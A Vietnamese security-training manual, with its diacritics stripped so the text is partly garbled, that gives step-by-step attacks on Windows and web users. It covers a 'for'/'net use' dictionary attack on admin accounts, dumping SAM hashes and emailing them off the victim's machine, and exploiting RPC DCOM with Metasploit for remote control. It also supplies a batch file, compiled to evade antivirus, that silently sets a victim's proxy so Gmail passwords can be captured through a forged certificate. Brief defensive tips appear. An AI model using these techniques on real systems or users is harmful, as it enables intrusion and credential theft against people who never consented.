Tan Cong Va Bao Ve He Thong - Tocbatdat.i-Train - Com.vn

Copyright by Tocbatdat
Research manager I-train.com.vn
Tn cng v bo v h thng
Copyright by Tocbatdat Research Manager I-train.com.vn
I-train.com.vn
Professional Training Service
Phn I. Scan port ton tp v cch phng chng .......................................................6 I. Nguyn tc truyn thng tin TCP/IP ...................................................................6 1. Cu to gi tin TCP .........................................................................................6 2. Khi Client mun thc hin mt kt ni TCP vi Server u tin: .................7 3. Khi Client mun kt thc mt phin lm vic vi Server ...............................8 II. Nguyn tc Scan Port trn mt h thng. ..........................................................8 1. TCP Scan .........................................................................................................8 2. UDP Scan.......................................................................................................10 III. Scan Port vi Nmap. .......................................................................................10 IV. Kt lun...........................................................................................................13 Phn I. Tn cng Password ca ti khon ngi dng trong Windows. .................14 I.S dng lnh For trong Windows. .....................................................................14 1. Gii m mt khu c m ho. ....................................................................16 Phn II. Tn cng h thng Windows qua l hng bo mt. ...................................23 1. Dng Retina Network Security Scanner 5.1 tm l hng trn h thng. ..24 Phn III. Hack password xc thc bng Certificate v cch phng chng .............32 I. Hiu bit chung..................................................................................................32 II. Tools s dng ...................................................................................................35 III. K thut ly Password Gmail .........................................................................36 1. t proxy cho ngi dng .............................................................................36 2. Tit hnh ........................................................................................................37
I-train.com.vn Professional Training Service
I. Pht hin v bo mt cho Account Gmail .........................................................45 1. Pht hin khi vo mng c qua mt Proxy hay khng ..................................45 Phn IV. Tn cng DoS/DDoS v cch phng chng .............................................50 I. Lch s ca tn cng DoS ..................................................................................50 1. Mc tiu .........................................................................................................50 2. Cc cuc tn cng. .........................................................................................50 II. nh ngha v tn cng DoS ............................................................................51 1. Cc mc ch ca tn cng DoS ....................................................................51 2. Mc tiu m k tn cng thng s dng tn cng DoS ..............................52 III. Cc dng tn cng ...........................................................................................52 1. Cc dng tn cng DoS..................................................................................52 IV. Cc cng c tn cng DoS..............................................................................58 1. Tools DoS Jolt2 ..........................................................................................59 2. Tools DoS: Bubonic.c....................................................................................59 3. Tools DoS: Land and LaTierra ......................................................................60 4. Tools DoS: Targa ...........................................................................................60 5. Tools DoS Blast 2.0 .......................................................................................61 6. Tools DoS Nemesys ...................................................................................61 7. Tool DoS Panther2. ....................................................................................62 8. Tool DoS Crazy Pinger...............................................................................62 9. Tool DoS Some Trouble .............................................................................64 10. DoS Tools UDP Flood ..............................................................................65 11. Tools DoS FSMAX ..................................................................................66
V. Kt lun phn I. ................................................................................................66 VI. Mng BOT NET .............................................................................................68 1. ngha ca mng BOT .................................................................................68 2. Mng BOT .....................................................................................................69 3. Mng Botnet. .................................................................................................69 4. Mc ch s dng mng Botnets ...................................................................70 5. Cc dng ca mng BOT. ..............................................................................71 6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot. .....................72 7. S cch h thng b ly nhim v s dng Agobot. .................................74 VII. Cc tools tn cng DDoS ..............................................................................74 1. Nuclear Bot. ...................................................................................................74 VIII. Tn cng DDoS............................................................................................75 1. Cc c tnh ca tn cng DDoS. ..................................................................76 2. Tn cng DDoS khng th ngn chn hon ton. .........................................76 3. K tn cng khn ngoan. ...............................................................................77 IX. Phn loi tn cng DDoS................................................................................78 X. Tn cng Reflective DNS (reflective - phn chiu). .......................................80 1. Cc vn lin quan ti tn cng Reflective DNS .......................................80 2. Tool tn cng Reflective DNS ihateperl.pl ................................................81 Phn VI. K thut edit Registry bng cu lnh v ng dng bo mt.....................83 1. Vai tr ca Command Line...............................................................................83 2. To ra file.bat thc thi t ng mt s thao tc ................................................83 3. Cu hnh REGISTRY bng file.bat ..................................................................85
4. ng dng cu hnh REGISTRY .......................................................................87 5. Kt lun .............................................................................................................89 Phn VII. Backdoor v Trojan ton tp ...................................................................90 1. Gii thiu v Trojans. .......................................................................................90 2. Cc dng v cch hot ng ca Trojan ...........................................................91 3. Nhng con ng my tnh nn nhn nhim Trojan. ..................................92 4. Nhng cch nhn bit mt my tnh b nhim Trojans C bn nht C th khng ng............................................................................................................93 5. S dng mt s loi Trojan...............................................................................94 6. Cch n mt hoc nhiu Trojan vo mt file .exe hay file chy bnh thng102 7. Cch pht hin Trojan. ....................................................................................106 8. Cch phng chng Trojans v Backdoor ........................................................110 9. Kt lun. ..........................................................................................................111 Phn VIII. K thut hack Web s dng upload file PHP v cch phng chng ...112 I. Cc tools cn thit ...........................................................................................113 1. Burpsuite_v1.3 .............................................................................................113 II. K thut upload file PHP v chim quyn iu khin my ch web ............114 1. Chun b .......................................................................................................114 2. Thc hin Upload file php ln website ........................................................114 III. K thut bo v my ch .................................................................................138
I-train.com.vn
Phn I. Scan port ton tp v cch phng chng
Trong bi vit ny ti trnh by vi cc bn cc nguyn tc Scan Port c bn trn h thng, nhng k thut scan t chng ta bit trn mt h thng ang s dng nhng Port no. T nhng khi nim v Scan ti cng trnh by vi cc bn gii php ngn cm Scan trn h thng. Ni dung trong bi vit gm: 1. Nguyn tc truyn thng tin TCP/IP 2. Cc Nguyn tc v Phng thc Scan Port 3. S dng phn mm Nmap I. Nguyn tc truyn thng tin TCP/IP 1. Cu to gi tin TCP
I-train.com.vn
Trong bi vit ny ti ch ch trng ti cc thit lp Flag trong gi tin TCP nhm mc ch s dng Scan Port: - Thng s SYN yu cu kt ni gia hai my tnh - Thng s ACK tr li kt ni gia hai my c th bt u c thc hin - Thng s FIN kt thc qu trnh kt ni gia hai my - Thng s RST t Server ni cho Client bit rng giao tip ny b cm (khng th s dng) - Thng s PSH s dng kt hp vi thng s URG - Thng s URG s dng thit lp u tin cho gi tin ny. Tht ra ton b cc thng s ny trong gi tin n ch th hin l 1 hoc 0 nu l 0 th gi tin TCP khng thit lp thng s ny, nu l 1 th thng s no c thc hin n s ln lt trong 8 bits trong phn Flag. 2. Khi Client mun thc hin mt kt ni TCP vi Server u tin:
+ Bc I: Client bn n Server mt gi tin SYN + Bc II: Server tr li ti Client mt gi tin SYN/ACK + Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK v qu trnh trao i thng tin gia hai my bt u.
I-train.com.vn
3. Khi Client mun kt thc mt phin lm vic vi Server
+ Bc I: Client gi n Server mt gi tin FIN ACK + Bc II: Server gi li cho Client mt gi tin ACK + Bc III: Server li gi cho Client mt gi FIN ACK + Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v Client c thc hin. II. Nguyn tc Scan Port trn mt h thng. 1. TCP Scan Trn gi TCP/UDP c 16 bit dnh cho Port Number iu c ngha n c t 1 65535 port. Khng mt hacker no li scan ton b cc port trn h thng, chng ch scan nhng port hay s dng nht thng ch s dng scan t port 1 ti port 1024 m thi. Phn trn ca bi vit ti trnh by vi cc bn nguyn tc to kt ni v ngt kt ni gia hai my tnh trn mng. Da vo cc nguyn tc truyn thng tin ca TCP ti c th Scan Port no m trn h thng bng nhng phng thc sau y: - SYN Scan: Khi Client bn gi SYN vi mt thng s Port nht nh ti Server nu server gi v gi SYN/ACK th Client bit Port trn Server c m. Nu Server gi v cho Client gi RST/SYN ti bit port trn Server ng.
I-train.com.vn
- FIN Scan: Khi Client cha c kt ni ti Server nhng vn to ra gi FIN vi s port nht nh gi ti Server cn Scan. Nu Server gi v gi ACK th Client bit Server m port , nu Server gi v gi RST th Client bit Server ng port . - NULL Scan Sure: Client s gi ti Server nhng gi TCP vi s port cn Scan m khng cha thng s Flag no, nu Server gi li gi RST th ti bit port trn Server b ng. - XMAS Scan Sorry: Client s gi nhng gi TCP vi s Port nht nh cn Scan cha nhiu thng s Flag nh: FIN, URG, PSH. Nu Server tr v gi RST ti bit port trn Server b ng. - TCP Connect: Phng thc ny rt thc t n gi n Server nhng gi tin yu cu kt ni thc t ti cc port c th trn server. Nu server tr v gi SYN/ACK th Client bit port m, nu Server gi v gi RST/ACK Client bit port trn Server b ng. - ACK Scan: dng Scan ny nhm mc ch tm nhng Access Controll List trn Server. Client c gng kt ni ti Server bng gi ICMP nu nhn c gi tin l Host Unreachable th client s hiu port trn server b lc. C vi dng Scan cho cc dch v in hnh d b tn cng nh: - RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng. - Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt s port nht nh. - FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay khng - IDLE cho php kim tra tnh trng ca my ch.
I-train.com.vn
2. UDP Scan. Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c truyn ti ch. Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu nhanh vi cc gi tin nh. Vi qu trnh thc hin truyn tin bng TCP k tn cng d dng Scan c h thng ang m nhng port no da trn cc thng s Flag trn gi TCP. Cu to gi UDP
Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng cc phng thc Scan port ca TCP s dng cho UDP c. Tht khng may hu ht h thng u cho php gi ICMP. Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi mt gi ICMP type 3 code 3 port vi ni dung l unreachable v Client. Khi thc hin UDP Scan bn hy chun b tinh thn nhn c cc kt qu khng c tin cy cao. III. Scan Port vi Nmap. Nmap l mt tool scan port rt mnh v ni danh t lu c gii hacker tin dng. N h tr ton b cc phng thc scan port, ngoi ra n cn h tr cc phng thc scan hostname, service chy trn h thng .
I-train.com.vn
Nmap hin gi c c giao din ho v giao din command line cho ngi dng, chy trn c mi trng .NIX v Windows. Phn mm nmap min ph cc bn download ti a ch:
http://nmap.org/download.html Di y l cch s dng Nmap scan C:\nmap-3.93>nmap -h Nmap 3.93 Usage: nmap [Scan Type(s)] [Options] <host or net list> Some Common Scan Types ('*' options require root privileges) * -sS TCP SYN stealth port scan (default if privileged (root)) -sT TCP connect() port scan (default for unprivileged users) * -sU UDP port scan -sP ping scan (Find any reachable machines) * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only) -sV Version scan probes open ports determining service and app names/versions -sR/-I RPC/Identd scan (use with other scan types) Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system -p <range> ports to scan. Example range: '1-1024,1080,6666,31337' -F Only scans ports listed in nmap-services -v Verbose. Its use is recommended Use twice for greater effect. -P0 Don't ping hosts (needed to scan www.microsoft.com and others) * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys -6 scans via IPv6 rather than IPv4 -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve] -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile> -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface --interactive Go into interactive mode (then press h for help) --win_help Windows-specific features Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*' SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
Nmap Scan a. Cc dng Scan nmap h tr. Nmap sT: trong ch s l Scan, cn ch T l dng TCP scan Nmap sU: l s dng UDP Scan Nmap sP: s dng Ping scan Nmap sF: s dng FIN Scan Nmap sX: s dng phng thc XMAS Scan Nmap sN: s dng phng thc NULL Scan Nmap sV: s dng Scan tn cc ng dng v version ca n Nmap SR /I RPC s dng scan RPC b. Cc option cao cp kt hp vi cc dng Scan trong Nmap. - O: s dng bit h iu hnh chy trn my ch v nh ta dng Nmap s dng phng thc scan l XMAS Scan v on bit h iu hnh ca: www.vnexperts.net ta dng cu lnh: nmap sX o www.vnexperts.net. - P: gii port s dng scan
I-train.com.vn
- F: Ch nhng port trong danh sch scan ca Nmap - V: S dng Scan hai ln nhm tng tin cy v hiu qu ca phng thc scan no ta s dng. - P0: khng s dng ping Scan nhm mc ch gim thiu cc qu trnh qut ngn chn scan trn cc trang web hay my ch. V nh ti mun Scan trang web www.vnexperts.net bng phng thc UDP Scan s port ti s dng l t 1 ti 1024 v s dng hai ln nng cao hiu qu, khi scan s khng ping ti trang ny: Nmap sU P 1-1024 V P0 www.vnexperts.net Ngoi ra nmap cn h tr tnh nng scan n nhm trnh nhng qu trnh qut trn server nh s dng: -Ddecoy_host1, decoy2 s n qu trnh Scan. -6: Scan IPv6 Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh dng file khc nhau. IV. Kt lun. Scan port l mt trong nhng bc u tin tn cng vo mt h thng, hiu c cc phng thc scan chng ta c th dng nmap thc hin. Sau cch chng ta cm Scan l s dng cc thit b chuyn dng nh IPS, IDS detect v ngn chn tn cng
I-train.com.vn
Phn II. Hack Windows ton tp v cch phng chng Hack Windows ton tp Cch phng chng. Windows l h iu hnh ph bin nht trn th gii, n lun tim n nhng li bo mt. Trong bi vit ny ti s trnh by vi cc bn nhng phng thc tn cng mt my tnh ci h iu hnh Windows. T nhng kin thc v kh nng tn cng vo my tnh ci h iu hnh Windows ti s a ra cc gii php bo mt cho h thng. Cc ni dung trong bi vit: 1. Tn cng Password ca ti khon trong Windows. 2. Tn cng my tnh ci Windows thng qua cc l hng bo mt Phn I. Tn cng Password ca ti khon ngi dng trong Windows.
Switch My tn cng My b tn cng Ci Windows 2003
I.S dng lnh For trong Windows. - My b tn cng a ch IP: 192.168.1.18, my s dng tn cng cng nm trong mng 192.168.1.0/24. - Hu ht tt c cc my u chia s ti nguyn trong h thng mng, v c mt th mc c Share n mc nh l th mc \\computer\IPC$ - Khi ta bit c User trn my l Administrator ta ch quan tm lm th no bit c mt khu ca ti khon .
I-train.com.vn
- To mt file t in cha hu ht cc mt khu thng dng dng tools Dictionary Generator to ra b t in ny. - Cu to ca lnh for: - For /f tokens=1 %a in (vnedic.txt) do net use * \\computer\IPC$ /user:administrator %a - Trong vnedic.txt l file t in c to, s dng Net User Map
File t in ti I: vi tn vnedic.txt. Sau khi h thng tm password trong file vnedict.txt tm c password ca ti khon Administrator ca my 192.168.1.8 l 123. - C rt nhiu phng php to ra b t in s dng lnh for tn cng vo h thng Windows. - Nhc im ca phng php ny l rt chm c th tn cng c mt h thng my tnh c mt khu phc tp. Gii php chng tn cng s dng lnh For:
- Thit lp trong Group Policy khi g Password sai 5 ln s b lock 30 pht
1. Gii m mt khu c m ho. a. Trn my Local - Gi s bn khng bit mt khu ca mt my tnh trong h thng, nhng bn li nh ngi g mt khu ca h v cho bn mn my tnh dng tm. V bn gi y l lm th no bit c Password trn my bn ang logon. - Rt nhiu phn mm c th Exports on m ho ca Password ra thnh mt File in hnh l PasswordDump, WinPasswordPro, trong bi vit ny ti trnh by vi cc bn s dng WinPasswordPro. Bt chng trnh WinPasswordPro ln Import Password t my Local
I-train.com.vn
Sau Khi Import Password t file SAM vo s c
I-train.com.vn
Sau ta Export danh sch User v Password c m ho ra mt file .txt v gi vo Mail ca chng ta, sang my chng ta cng dung phn mm ny gii m ngc li.
M file TXT exports ra ta c d liu password c m ho
Sau khi ly c d liu User Password m ho ta Uninstall chng trnh ny trn my nn nhn khi l - ri gi file vo Mail v my ca ta Gii m y l cng on tn thi gian. i vi mt khu di 10 k t mt khong 1 ting.
- Bt chng trnh WinPasswordPro trn my ca chng ta chn File -> Import PWDUMP file ri chn ng dn ti file password c m ho. Sau khi Import t file PWDUMP ta c - Nhn vo Start ta s c 3 phng thc tn cng Password + Brute Force + Dictionary + Smart Table
Ti chn phng thc tn cng Brute Force
I-train.com.vn
i khong 15 pht (y l password do ti khng t k t c bit, khng s, khng hoa v 9 k t) - Kt thc qu trnh ti gii m c file Password c m ho vi: user administrator v Password l vnexperts
I-train.com.vn
b. Tn cng my t xa. - Khi chng ta c ngi trn my nn nhn Exports Password c m ho l n gin nhng thc t s rt t khi thc hin c phng thc ny. - Dng Password Dump chng ta s ly c d liu c m ho t mt my t xa. - y ti dng PasswordDump Version 6.1.6
I-train.com.vn
trn ti s ly d liu m ho Username v Password t my tnh 192.168.1.156 dung PWDump v out d liu ra file: vnehack.txt ti C: dng lnh Type xem d li ca file . Sau Khi c d liu ny ta li s dng WinPasswordPro gii m. V sau khi ta c ti khon User Administrator v Password ca n th vic lm g l tu thuc vo chng ta. - Gii php phng chng hnh thc tn cng ny: + phng nhng ngi truy cp vo my tnh ca chng ta. + t Password di trn 14 k t v c y cc k t: c bit, hoa, s, thng
I-train.com.vn
+ Enable Firewall ln chng PasswordDUMP, Ci t v cp nht cc bn v li mi nht t nh sn xut + Ci t ti thiu mt chng trnh dit Virus mnh.
V hiu ho PWdump nhng lu khi k tn cng c mt ti khon trong h thng th li hon ton khc chng s vt qua hu ht cc phng chng bo mt: trong trng hp ny ti c mt User bnh thng vi tn vne ti c th Exports ton b d liu Username Password c m ho my ch.
Phn II. Tn cng h thng Windows qua l hng bo mt. - u tin chng ta phi tm nhng l hng bo mt. - Khai thc l hng tm c
1. Dng Retina Network Security Scanner 5.1 tm l hng trn h thng. Bt chng trnh Retina Network Security Scanner ln: Chng ta mun tm kim trong h thng mng nhng my no ang Online vo phn Discover pht hin ra l hng bo mt s dng Tab Audit
Ti s s dng chng trnh ny kim tra my 192.168.1.8
I-train.com.vn
Nhn Start - Chn Scan Template l ch Complete Scan: i mt nt ti c kt qu tht bt ng: my tnh 192.168.1.8 b rt nhiu l hng bo mt - Ti pht hin ra li nguy him trn my cha c Fix trn Service RPC l: Windows RPC DCOM Multiple Vulerabilities. - c thm phn m rng v li ny ti pht hin ra li ny cho php ta truy cp bt hp php ti my tnh .
I-train.com.vn
Retina Network Security Scanner l phn mm rt hiu qu Scan h thng v pht hin ra cc l hng bo mt y l phn mm c bn quyn. 1. S dng Metasploit khai thc. - Nhng l hng va c Retina pht hin gi chng ta s s dng Metasploit khai thc chng, y ti dung bn metasploit 2.7 - Hin nay c bn 3.0 Sau khi ci t MetaSploit ti bt giao din Web bng cch di y:
I-train.com.vn
- Sau bt MSFWeb ti vo IE g a ch: http://127.0.0.1:55555
I-train.com.vn
- La trn trong Filter Modules l Windows 2003
Trong nhng li tm thy v c th khai thc bi MetaSploit trn Windows 2003 ti tm thy li RPC Service
Nhn vo l hng bo mt ny
I-train.com.vn
Chng trnh thong bo l hng bo mt ny s c khai thc trn cc h iu hnh NT, 2K, XP, v 2K3 Nhn vo h thng s cho php chng ta s dng cc chng trnh di y khai thc vo l hng bo mt ny
I-train.com.vn
Ti la chn Win32_Reverse_vncinject Sauk hi ti la chn s dng vncinject ti la chn my ch cn Sploit l: 192.168.1.8
Nhn Exploit khai thc l hng bo mt trn
I-train.com.vn
Kt qu tht tuyt vi ti Remote Desktop n my m khng cn thong qua bt c phng thc xc thc no, v gi ti ton quyn vi my tnh ny.
Mt kt qu lm au u cc nh bo mt nhng chng ta khng phi khng c gii php phng chng. - Cch phng chng cc li bo mt l: + Lun update cc bn v li mi nht t nh sn xut + Enable Firewall ch m nhng cng cn thit cho cc ng dng + C thit b IDS pht hin xm nhp + C Firewall chng Scan cc Service ang chy.
I-train.com.vn
Phn III. Hack password xc thc bng Certificate v cch phng chng Trong bi vit ny ti s trnh by vi cc bn k thut Hack Password ca s dng Certificate m ha nh gmail.com hay cc trang web khc xc thc mt cch tng t (SSL Certificate HTTPS). i vi nguy c bn c th b l Password Gmail, trong bi vit ny ti s trnh by cch nhn bit v ngn chn nguy c ny. I. Hiu bit chung - Gmail hay nhng dch v web khc thng s dng HTTPS m ha gi tin User/Pass. Khi trnh duyt web s dng Certificate ca Gmail cung cp v m ha th gi tin User/Pass khi i trn mng s an ton mc (gn nh tuyt i). - K h y l th no m li c th Hack c pass ca nhng phng thc xc thc v m ha c tnh bo mt cao. Qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:
Bc 1: Ngi dng truy cp gmail.com Bc 2: Gmail s gi thng tin ti Versign ly Certificate
I-train.com.vn
Bc 3: Versign gi li cho Gmail Certificate bao gm: Public Key v Private key Bc 4: Gmail gi li cho ngi dng Public Key m ha thng tin xc thc Bc 5: Ngi dng s dng Public Key m ha gi ln Gmail Bc 6: Gmail s dng Private key gii m *note: gi tin m ha user/pass ngi dng gi ln gmail c m ha bng public key th ch c private key mi gii m dc. Trong khi Private key c Gmail d li v khng truyn trn mng. Nn gi tin ny cc k bo mt v khng c kh nng gii m
I-train.com.vn
K thut gi mo Certifcate Ngi dng vo Gmail s khng i thng m i qua mt Intercepting Proxy v b gi mo Certificate
Bc 1: Ngi dng vo Gmail Bc 2: Khi gi tin t ngi dng vo Intercept proxy n s chnh sa thng tin v gi ln Gmail Bc 3: Gmail gi yu cu ln Versign sinh Certificate Bc 4: Verisign gi Certificate v cho Gmail. Gmail d li Private key v gi cho ngi yu cu Public key Bc 5: Gmail gi Public key cho Intercept Proxy, Key ny s khng c gi cho ngi dng
Bc 6: Intercept Proxy t ra mt cp key v gi Public key v cho ngi dng Bc 7: ngi dng s dng Public Key gi ny do Proxy sinh ra m ha user/pass v gi ln cho proxy. Proxy do t sinh ra cp key nn s c Private key gii m. Bc 8: Sau khi gii m c gi tin ngi dng truyn ln Proxy s s dng Public Key ca Gmail gi cho ri m ha gi ln gmail v qu trnh xc thc vn dc thc hin *Note: Khi nu k tn cng ng trn con Intercept Proxy th hon ton c th bit c User/Pass ca ngi dng. Ngi dng khng ch khi i qua mt Intercept proxy th user/pass hon ton c th b l, mc d s dng cc phng thc xc thc rt bo mt II. Tools s dng - Burpsuite_v1.3 Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip y l mt tools c tnh nng l mt Intercept Proxy - Java (Burpsuite l file .jar chy trn nn Java) Link download: http://sun.com - IE, Firefox - Tools thit lp Proxy bng mt file y l tools ti t vit dng file .bat hoc cc bn c th chuyn file.bat sang file.exe khi ngi dng kch vo file ny s t ng thit lp Proxy - Quick_Batch_File_Compiler_3.21 l mt tools chuyn file.bat file.exe
III. K thut ly Password Gmail Cch thng thng nht l s dng Keylogger nhng cch ny khng s dng c khi c cc chng trnh dit virus mnh. - Export thng tin t trnh duyt web nh IE, Firefox. Cch ny khng thc hin c khi ngi dng khng lu User/Pass trn trnh duyt - Cn mt cch l gi mo Certificate v s dng Intercept Proxy 1. t proxy cho ngi dng - ton b ni dung ngi dng truy cp web i qua Intercept Proxy th cn phi thit lp proxy trn trnh duyt ca ngi dngj - Cch thit lp c th bn thit lp bng tay (bng mt cch no c quyn iu khin my tnh ca nn nhn) - Hng ngi dng chy mt file.exe m do chng ta vit thit lp proxy ******** To ra mt file.bat vi ni dung: echo Windows Registry Editor Version 5.00 > 1 echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Internet Settings] >2 echo "MigrateProxy"=dword:00000001 > 3 echo "ProxyEnable"=dword:00000001 > 4 echo "ProxyHttp1.1"=dword:00000000 > 5 echo "ProxyServer"="IP:port" > 6 echo "ProxyOverride"="<local>" > 7 copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg del 1 /f /q del 2 /f /q del 3 /f /q
del 4 /f /q del 5 /f /q del 6 /f /q del 7 /f /q regedit.exe /s b.reg del b.reg /f /q ******** Sau dng tools Quick_Batch_File_Compiler_3.21 chuyn file.bat ny sang file.exe - Khi ngi dng nhn vo file ny s t ng thit lp proxy cho IE vi IP bn thay bng IP bn cn thit lp, Port l port ca Proxy s dng. iu rt hay l file ny tt c cc chng trnh dit virus u khng coi l Virus - Trong bi vit ny ti s dng mt my tnh nn proxy ti thit lp trn trnh duyt l 127.0.0.1 2. Tit hnh Bc 1: Ci t Java Bc 2: Chy Burpsuite Bc 3: Thit lp Proxy Bc 4: Truy cp Gmail Bc 5: Vo Proxy xem thng tin User/Pass Bc 1: Ci t Java - Sau khi bn download b ci Java t trang sun.com bn ci t chun b mi trng cho cc chng trnh chy trn mi trng Java Bc 2: Chy Burpsuite - Sau khi download Burpsuite tin hnh gii nn khi n file .jar th dng li
- Chy chng trnh Burpsuite_v1.3 lm Intercepting Proxy. Nhn p vo file .jar gii nn t b download c
Chy chng trnh Burpsuite
I-train.com.vn
I-train.com.vn
Mc nh chng trnh ny ch lm proxy cho chnh my chy chng trnh, cc my khc c th s dng chng trnh ny lm proxy phi Vo tab proxy chn Options ri c th Edit ty bin port s dng (mc nh l 8080) b du check box loopback ony
Chuyn sang tab Intercept cu hnh cc mode hot ng ca Intercepting proxy - Ch Intercept on: y l ch hot ng. Nu mt ngi t my tnh ny lm proxy th ton b qu trnh truy cp ra internet u b proxy ny qun l. Khi mt request t trnh duyt ti Proxy, n s pht hin ni dung c th chnh sa v forward i th mi ti my ch web - Chng ta tt ch ny bng cch nhn vo Intercept on s thnh off. Mc ch khi ngi dng s dng phn mm ny lm proxy th vn c th vo Internet bnh thng. ch ny ch lu li cc thng tin ngi dng truy cp
I-train.com.vn
web
Bc 3: t Proxy - Vo IE chnh proxy vo a ch 127.0.0.1 port 8080. IE IE options tab connection nhn vo nt LAN Settings - Hoc chy file.bat vi ni dung nh trn - Dng tools chuyn file.bat file.exe ri chy file.exe ny cng c
I-train.com.vn
Bc 4: Vo Gmail qua IE ( thit lp Proxy) Truy cp vo Gmail s thy thng bo Certificate li nhn continue tip tc
I-train.com.vn
Tip tc google s thng bo Certificate Error bn vn g Username password truy cp vo Mail
Ti vo c mail vn cn thng bo Certificate Error
I-train.com.vn
Bc 5: Vo Proxy tm thng tin Username v Pass - Vo Burpsuite Chuyn sang tab Target Chn Site Map - La chn trang web https://www.google.com Vo mc Accounts Vo mc ServiceLoginAuth Nhn chuyn sang bn phi chn Request (thng tin gi ln server) vo mc Raw chng ta s thy thng tin Username v Passwor
I-train.com.vn
I. Pht hin v bo mt cho Account Gmail Mun hack password gmail k tn cng phi hng ngi dng t Proxy i qua mt Intercept Proxy sau gi mo Certificate do mun pht hin v bo mt cho Account Gmail bn c th thc hin bng cc cch: 1. Pht hin khi vo mng c qua mt Proxy hay khng Kim tra bng cch trc khi vo Internet truy cp vo mc thit lp Proxy xem c a ch no c thit lp hay cha. Cch ny rt hu ch nhng xem ra c phn rm r kh thc hin v d b qun hay b qua 1. Pht hin Certificate b gi mo a. Khi truy cp bnh thng + Vo Gmail s khng bt ra nhng pop-up xut download Certificate + Nhn chut vo biu tng cc kha view Certifcate s thy n c sinh ra t Verisign
I-train.com.vn
I-train.com.vn
b.
Khi truy cp i qua mt Intercept Proxy
+ Truy cp vo Gmail s xut hin ca s ny thng bo Certificate ca bn b li c tip tc hay khng. Nu thy biu tng ny khuyn co ngi dng khng nn tip tc v kim tra li an ton ca mng v my tnh trc khi truy cp
I-train.com.vn
+ Nu ngi dng tip tc truy cp vo trang Gmail s khng c biu tng cc kha m thay vo l biu tng Certificate Error. + Nhn xem Certificate ny chng ta s thy Certificate ny khng phi do Verisign sinh ra
I-train.com.vn
Note: Nu ngi dng thy hai yu t ny khuyn co khng nn tip tc vo Gmail v Username v password ca bn hon ton c th b mt. Ngoi ra ngi dng khng nn lu mt khu t ng truy cp bi khi my tnh ri vo tay ngi khc th thng tin cn lu li trn IE, Firefox hon toan c th b khai thc d dng. Ngi dng cng nn ci t cc chng trnh dit Virus ngn chn cc loi Virus, Keylogger n chm mt khu.
I-train.com.vn
Phn IV. Tn cng DoS/DDoS v cch phng chng Ni dung chi tit trong bi vit: 1. Lch s cc cuc tn cng DoS v DDoS 2. nh ngha v: Denial of Service Attack 3. Cc dng tn cng DoS 4. Cc tool tn cng DoS 5. Mng BOT net 6. Tn cng DDoS 7. Phn loi tn cng DDoS 8. Cc tools tn cng DDoS 9. Su my tnh (worms) trong tn cng DDoS I. Lch s ca tn cng DoS 1. Mc tiu - Mc tiu cc cuc tn cng thng vo cc trang web ln v cc t chc thng mi in t trn Internet. 2. Cc cuc tn cng. - Vo ngy 15 thng 8 nm 2003, Microsoft chu t tn cng DoS cc mnh v lm gin on websites trong vng 2 gi. - Vo lc 15:09 gi GMT ngy 27 thng 3 nm 2003: ton b phin bn ting anh ca website Al-Jazeera b tn cng lm gin on trong nhiu gi
I-train.com.vn
II. nh ngha v tn cng DoS Tn cng DoS l kiu tn cng v cng nguy him, hiu c n ta cn phi lm r nh ngha ca tn cng DoS v cc dng tn cng DoS. - Tn cng DoS l mt kiu tn cng m mt ngi lm cho mt h thng khng th s dng, hoc lm cho h thng chm i mt cch ng k vi ngi dng bnh thng, bng cch lm qu ti ti nguyn ca h thng. - Nu k tn cng khng c kh nng thm nhp c vo h thng, th chng c gng tm cch lm cho h thng sp v khng c kh nng phc v ngi dng bnh thng l tn cng Denial of Service (DoS). Mc d tn cng DoS khng c kh nng truy cp vo d liu thc ca h thng nhng n c th lm gin on cc dch v m h thng cung cp. Nh nh ngha trn DoS khi tn cng vo mt h thng s khai thc nhng ci yu nht ca h thng tn cng, nhng mc ch ca tn cng DoS: 1. Cc mc ch ca tn cng DoS - C gng chim bng thng mng v lm h thng mng b ngp (flood), khi h thng mng s khng c kh nng p ng nhng dch v khc cho ngi dng bnh thng. - C gng lm ngt kt ni gia hai my, v ngn chn qu trnh truy cp vo dch v. - C gng ngn chn nhng ngi dng c th vo mt dch v no - C gng ngn chn cc dch v khng cho ngi khc c kh nng truy cp vo. - Khi tn cng DoS xy ra ngi dng c cm gic khi truy cp vo dch v nh b: + Disable Network - Tt mng
I-train.com.vn
